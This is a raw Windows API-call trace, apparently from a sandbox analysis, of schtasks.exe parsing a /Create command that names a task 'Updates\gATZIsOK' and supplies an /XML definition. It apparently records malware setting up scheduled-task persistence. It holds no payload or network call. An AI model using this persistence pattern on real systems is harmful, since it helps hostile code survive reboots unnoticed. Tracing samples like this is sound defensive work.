[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4926830
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x49273e0
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4926850
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4926870
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49265c8
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49265e8
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x4927488
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4926608
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4922778
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4922798
[0184.220] GetProcessHeap () returned 0x4920000
[0184.220] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49227b8
[0184.221] SetThreadUILanguage (LangId=0x0) returned 0x409
[0184.336] RtlRestoreLastWin32Error () returned 0x0
[0184.336] GetProcessHeap () returned 0x4920000
[0184.336] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929578
[0184.336] GetProcessHeap () returned 0x4920000
[0184.336] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929678
[0184.336] GetProcessHeap () returned 0x4920000
[0184.336] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49294f8
[0184.336] GetProcessHeap () returned 0x4920000
[0184.336] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929358
[0184.336] GetProcessHeap () returned 0x4920000
[0184.336] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49294d8
[0184.336] GetProcessHeap () returned 0x4920000
[0184.336] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x4927398
[0184.336] _memicmp (_Buf1=0x4927398, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.336] GetProcessHeap () returned 0x4920000
[0184.336] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x208) returned 0x4928cd0
[0184.336] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4928cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0184.336] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdfb04 | out: lpdwHandle=0xdfb04) returned 0x76c
[0184.354] GetProcessHeap () returned 0x4920000
[0184.354] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x776) returned 0x4929da8
[0184.354] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4929da8 | out: lpData=0x4929da8) returned 1
[0184.354] VerQueryValueW (in: pBlock=0x4929da8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdfb0c, puLen=0xdfb10 | out: lplpBuffer=0xdfb0c*=0x492a158, puLen=0xdfb10) returned 1
[0184.358] _memicmp (_Buf1=0x4927398, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.359] _vsnwprintf (in: _Buffer=0x4928cd0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdfaf0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0184.359] VerQueryValueW (in: pBlock=0x4929da8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdfb1c, puLen=0xdfb18 | out: lplpBuffer=0xdfb1c*=0x4929f88, puLen=0xdfb18) returned 1
[0184.359] lstrlenW (lpString="schtasks.exe") returned 12
[0184.359] lstrlenW (lpString="schtasks.exe") returned 12
[0184.359] lstrlenW (lpString=".EXE") returned 4
[0184.359] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0184.360] lstrlenW (lpString="schtasks.exe") returned 12
[0184.360] lstrlenW (lpString=".EXE") returned 4
[0184.360] _memicmp (_Buf1=0x4927398, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.360] lstrlenW (lpString="schtasks") returned 8
[0184.360] GetProcessHeap () returned 0x4920000
[0184.360] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929338
[0184.360] GetProcessHeap () returned 0x4920000
[0184.360] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929378
[0184.360] GetProcessHeap () returned 0x4920000
[0184.360] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49296b8
[0184.360] GetProcessHeap () returned 0x4920000
[0184.361] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929658
[0184.361] GetProcessHeap () returned 0x4920000
[0184.361] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x49273f8
[0184.361] _memicmp (_Buf1=0x49273f8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.361] GetProcessHeap () returned 0x4920000
[0184.361] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0xa0) returned 0x4928ee0
[0184.361] GetProcessHeap () returned 0x4920000
[0184.361] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4929398
[0184.361] GetProcessHeap () returned 0x4920000
[0184.361] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49293d8
[0184.361] GetProcessHeap () returned 0x4920000
[0184.361] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49293f8
[0184.361] GetProcessHeap () returned 0x4920000
[0184.361] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x4927368
[0184.361] _memicmp (_Buf1=0x4927368, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.361] GetProcessHeap () returned 0x4920000
[0184.361] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x200) returned 0x492a788
[0184.361] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x492a788, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0184.362] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0184.362] GetProcessHeap () returned 0x4920000
[0184.362] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x30) returned 0x4922580
[0184.362] _vsnwprintf (in: _Buffer=0x4928ee0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdfaf4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0184.362] GetProcessHeap () returned 0x4920000
[0184.362] GetProcessHeap () returned 0x4920000
[0184.362] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929da8) returned 1
[0184.362] GetProcessHeap () returned 0x4920000
[0184.362] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929da8) returned 0x776
[0184.363] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929da8) returned 1
[0184.363] RtlRestoreLastWin32Error () returned 0x0
[0184.363] GetThreadLocale () returned 0x409
[0184.363] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.363] lstrlenW (lpString="?") returned 1
[0184.363] GetThreadLocale () returned 0x409
[0184.363] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.363] lstrlenW (lpString="create") returned 6
[0184.363] GetThreadLocale () returned 0x409
[0184.363] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.363] lstrlenW (lpString="delete") returned 6
[0184.363] GetThreadLocale () returned 0x409
[0184.363] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.363] lstrlenW (lpString="query") returned 5
[0184.363] GetThreadLocale () returned 0x409
[0184.363] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.363] lstrlenW (lpString="change") returned 6
[0184.363] GetThreadLocale () returned 0x409
[0184.363] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.363] lstrlenW (lpString="run") returned 3
[0184.363] GetThreadLocale () returned 0x409
[0184.363] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.364] lstrlenW (lpString="end") returned 3
[0184.364] GetThreadLocale () returned 0x409
[0184.364] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.364] lstrlenW (lpString="showsid") returned 7
[0184.364] GetThreadLocale () returned 0x409
[0184.364] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0184.364] RtlRestoreLastWin32Error () returned 0x0
[0184.364] RtlRestoreLastWin32Error () returned 0x0
[0184.364] lstrlenW (lpString="/Create") returned 7
[0184.364] lstrlenW (lpString="-/") returned 2
[0184.364] StrChrIW (lpStart="-/", wMatch=0x28002f) returned="/"
[0184.364] lstrlenW (lpString="?") returned 1
[0184.364] lstrlenW (lpString="?") returned 1
[0184.364] GetProcessHeap () returned 0x4920000
[0184.364] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x49273c8
[0184.364] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.364] GetProcessHeap () returned 0x4920000
[0184.364] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0xa) returned 0x4927380
[0184.364] lstrlenW (lpString="Create") returned 6
[0184.364] GetProcessHeap () returned 0x4920000
[0184.364] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x10) returned 0x4927410
[0184.364] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.364] GetProcessHeap () returned 0x4920000
[0184.364] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49295b8
[0184.364] _vsnwprintf (in: _Buffer=0x4927380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0184.365] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|Create|") returned 8
[0184.365] lstrlenW (lpString="|?|") returned 3
[0184.365] lstrlenW (lpString="|Create|") returned 8
[0184.365] RtlRestoreLastWin32Error () returned 0x490
[0184.365] lstrlenW (lpString="create") returned 6
[0184.365] lstrlenW (lpString="create") returned 6
[0184.365] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.365] GetProcessHeap () returned 0x4920000
[0184.365] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927380) returned 1
[0184.365] GetProcessHeap () returned 0x4920000
[0184.365] RtlReAllocateHeap (Heap=0x4920000, Flags=0xc, Ptr=0x4927380, Size=0x14) returned 0x4929538
[0184.365] lstrlenW (lpString="Create") returned 6
[0184.365] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.365] _vsnwprintf (in: _Buffer=0x4929538, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0184.365] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|Create|") returned 8
[0184.365] lstrlenW (lpString="|create|") returned 8
[0184.365] lstrlenW (lpString="|Create|") returned 8
[0184.365] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0184.365] RtlRestoreLastWin32Error () returned 0x0
[0184.365] RtlRestoreLastWin32Error () returned 0x0
[0184.365] RtlRestoreLastWin32Error () returned 0x0
[0184.365] lstrlenW (lpString="/TN") returned 3
[0184.365] lstrlenW (lpString="-/") returned 2
[0184.365] StrChrIW (lpStart="-/", wMatch=0x28002f) returned="/"
[0184.365] lstrlenW (lpString="?") returned 1
[0184.365] lstrlenW (lpString="?") returned 1
[0184.365] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.366] lstrlenW (lpString="TN") returned 2
[0184.366] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.366] _vsnwprintf (in: _Buffer=0x4929538, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0184.366] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0184.366] lstrlenW (lpString="|?|") returned 3
[0184.366] lstrlenW (lpString="|TN|") returned 4
[0184.366] RtlRestoreLastWin32Error () returned 0x490
[0184.366] lstrlenW (lpString="create") returned 6
[0184.366] lstrlenW (lpString="create") returned 6
[0184.366] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.366] lstrlenW (lpString="TN") returned 2
[0184.366] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.366] _vsnwprintf (in: _Buffer=0x4929538, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0184.366] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0184.366] lstrlenW (lpString="|create|") returned 8
[0184.366] lstrlenW (lpString="|TN|") returned 4
[0184.366] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0184.366] RtlRestoreLastWin32Error () returned 0x490
[0184.366] lstrlenW (lpString="delete") returned 6
[0184.366] lstrlenW (lpString="delete") returned 6
[0184.366] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.366] lstrlenW (lpString="TN") returned 2
[0184.366] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.367] _vsnwprintf (in: _Buffer=0x4929538, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8
[0184.367] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0184.367] lstrlenW (lpString="|delete|") returned 8
[0184.367] lstrlenW (lpString="|TN|") returned 4
[0184.367] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0184.367] RtlRestoreLastWin32Error () returned 0x490
[0184.367] lstrlenW (lpString="query") returned 5
[0184.367] lstrlenW (lpString="query") returned 5
[0184.367] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.367] lstrlenW (lpString="TN") returned 2
[0184.367] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.367] _vsnwprintf (in: _Buffer=0x4929538, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7
[0184.367] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0184.367] lstrlenW (lpString="|query|") returned 7
[0184.367] lstrlenW (lpString="|TN|") returned 4
[0184.367] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0184.367] RtlRestoreLastWin32Error () returned 0x490
[0184.367] lstrlenW (lpString="change") returned 6
[0184.367] lstrlenW (lpString="change") returned 6
[0184.367] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.367] lstrlenW (lpString="TN") returned 2
[0184.367] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.367] _vsnwprintf (in: _Buffer=0x4929538, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8
[0184.367] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0184.367] lstrlenW (lpString="|change|") returned 8
[0184.368] lstrlenW (lpString="|TN|") returned 4
[0184.368] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0184.368] RtlRestoreLastWin32Error () returned 0x490
[0184.368] lstrlenW (lpString="run") returned 3
[0184.368] lstrlenW (lpString="run") returned 3
[0184.368] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.368] lstrlenW (lpString="TN") returned 2
[0184.368] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.368] _vsnwprintf (in: _Buffer=0x4929538, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5
[0184.368] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0184.368] lstrlenW (lpString="|run|") returned 5
[0184.368] lstrlenW (lpString="|TN|") returned 4
[0184.368] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0184.368] RtlRestoreLastWin32Error () returned 0x490
[0184.368] lstrlenW (lpString="end") returned 3
[0184.368] lstrlenW (lpString="end") returned 3
[0184.368] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.368] lstrlenW (lpString="TN") returned 2
[0184.368] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.368] _vsnwprintf (in: _Buffer=0x4929538, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5
[0184.368] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0184.368] lstrlenW (lpString="|end|") returned 5
[0184.368] lstrlenW (lpString="|TN|") returned 4
[0184.368] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0184.368] RtlRestoreLastWin32Error () returned 0x490
[0184.369] lstrlenW (lpString="showsid") returned 7
[0184.369] lstrlenW (lpString="showsid") returned 7
[0184.369] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.369] GetProcessHeap () returned 0x4920000
[0184.369] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929538) returned 1
[0184.369] GetProcessHeap () returned 0x4920000
[0184.369] RtlReAllocateHeap (Heap=0x4920000, Flags=0xc, Ptr=0x4929538, Size=0x16) returned 0x4929698
[0184.369] lstrlenW (lpString="TN") returned 2
[0184.369] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.369] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9
[0184.369] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0184.369] lstrlenW (lpString="|showsid|") returned 9
[0184.369] lstrlenW (lpString="|TN|") returned 4
[0184.369] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0184.369] RtlRestoreLastWin32Error () returned 0x490
[0184.369] RtlRestoreLastWin32Error () returned 0x490
[0184.369] RtlRestoreLastWin32Error () returned 0x0
[0184.369] lstrlenW (lpString="/TN") returned 3
[0184.369] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0184.369] RtlRestoreLastWin32Error () returned 0x490
[0184.369] RtlRestoreLastWin32Error () returned 0x0
[0184.369] lstrlenW (lpString="/TN") returned 3
[0184.369] GetProcessHeap () returned 0x4920000
[0184.369] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x8) returned 0x4926c60
[0184.369] GetProcessHeap () returned 0x4920000
[0184.369] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49295d8
[0184.369] RtlRestoreLastWin32Error () returned 0x0
[0184.369] RtlRestoreLastWin32Error () returned 0x0
[0184.369] lstrlenW (lpString="Updates\\gATZIsOK") returned 16
[0184.369] lstrlenW (lpString="-/") returned 2
[0184.370] StrChrIW (lpStart="-/", wMatch=0x280055) returned 0x0
[0184.370] RtlRestoreLastWin32Error () returned 0x490
[0184.370] RtlRestoreLastWin32Error () returned 0x490
[0184.370] RtlRestoreLastWin32Error () returned 0x0
[0184.370] lstrlenW (lpString="Updates\\gATZIsOK") returned 16
[0184.370] StrChrIW (lpStart="Updates\\gATZIsOK", wMatch=0x3a) returned 0x0
[0184.370] RtlRestoreLastWin32Error () returned 0x490
[0184.370] RtlRestoreLastWin32Error () returned 0x0
[0184.370] lstrlenW (lpString="Updates\\gATZIsOK") returned 16
[0184.370] GetProcessHeap () returned 0x4920000
[0184.370] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x22) returned 0x4928f88
[0184.370] GetProcessHeap () returned 0x4920000
[0184.370] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x49295f8
[0184.370] RtlRestoreLastWin32Error () returned 0x0
[0184.370] RtlRestoreLastWin32Error () returned 0x0
[0184.370] lstrlenW (lpString="/XML") returned 4
[0184.370] lstrlenW (lpString="-/") returned 2
[0184.370] StrChrIW (lpStart="-/", wMatch=0x28002f) returned="/"
[0184.370] lstrlenW (lpString="?") returned 1
[0184.370] lstrlenW (lpString="?") returned 1
[0184.370] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.371] lstrlenW (lpString="XML") returned 3
[0184.371] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.371] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0184.371] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0184.371] lstrlenW (lpString="|?|") returned 3
[0184.371] lstrlenW (lpString="|XML|") returned 5
[0184.371] RtlRestoreLastWin32Error () returned 0x490
[0184.371] lstrlenW (lpString="create") returned 6
[0184.371] lstrlenW (lpString="create") returned 6
[0184.371] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.371] lstrlenW (lpString="XML") returned 3
[0184.371] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.371] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0184.371] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0184.371] lstrlenW (lpString="|create|") returned 8
[0184.371] lstrlenW (lpString="|XML|") returned 5
[0184.371] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0184.371] RtlRestoreLastWin32Error () returned 0x490
[0184.371] lstrlenW (lpString="delete") returned 6
[0184.371] lstrlenW (lpString="delete") returned 6
[0184.371] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.371] lstrlenW (lpString="XML") returned 3
[0184.371] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.371] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8
[0184.371] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0184.372] lstrlenW (lpString="|delete|") returned 8
[0184.372] lstrlenW (lpString="|XML|") returned 5
[0184.372] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0
[0184.372] RtlRestoreLastWin32Error () returned 0x490
[0184.372] lstrlenW (lpString="query") returned 5
[0184.372] lstrlenW (lpString="query") returned 5
[0184.372] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.372] lstrlenW (lpString="XML") returned 3
[0184.372] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.372] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7
[0184.372] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0184.372] lstrlenW (lpString="|query|") returned 7
[0184.372] lstrlenW (lpString="|XML|") returned 5
[0184.372] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0
[0184.372] RtlRestoreLastWin32Error () returned 0x490
[0184.372] lstrlenW (lpString="change") returned 6
[0184.372] lstrlenW (lpString="change") returned 6
[0184.372] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.372] lstrlenW (lpString="XML") returned 3
[0184.372] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.372] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8
[0184.372] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0184.372] lstrlenW (lpString="|change|") returned 8
[0184.372] lstrlenW (lpString="|XML|") returned 5
[0184.372] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0
[0184.372] RtlRestoreLastWin32Error () returned 0x490
[0184.372] lstrlenW (lpString="run") returned 3
[0184.373] lstrlenW (lpString="run") returned 3
[0184.373] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.373] lstrlenW (lpString="XML") returned 3
[0184.373] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.373] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5
[0184.373] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0184.373] lstrlenW (lpString="|run|") returned 5
[0184.373] lstrlenW (lpString="|XML|") returned 5
[0184.373] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0
[0184.373] RtlRestoreLastWin32Error () returned 0x490
[0184.373] lstrlenW (lpString="end") returned 3
[0184.373] lstrlenW (lpString="end") returned 3
[0184.373] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.373] lstrlenW (lpString="XML") returned 3
[0184.373] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.373] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5
[0184.373] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0184.373] lstrlenW (lpString="|end|") returned 5
[0184.373] lstrlenW (lpString="|XML|") returned 5
[0184.373] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0
[0184.373] RtlRestoreLastWin32Error () returned 0x490
[0184.373] lstrlenW (lpString="showsid") returned 7
[0184.373] lstrlenW (lpString="showsid") returned 7
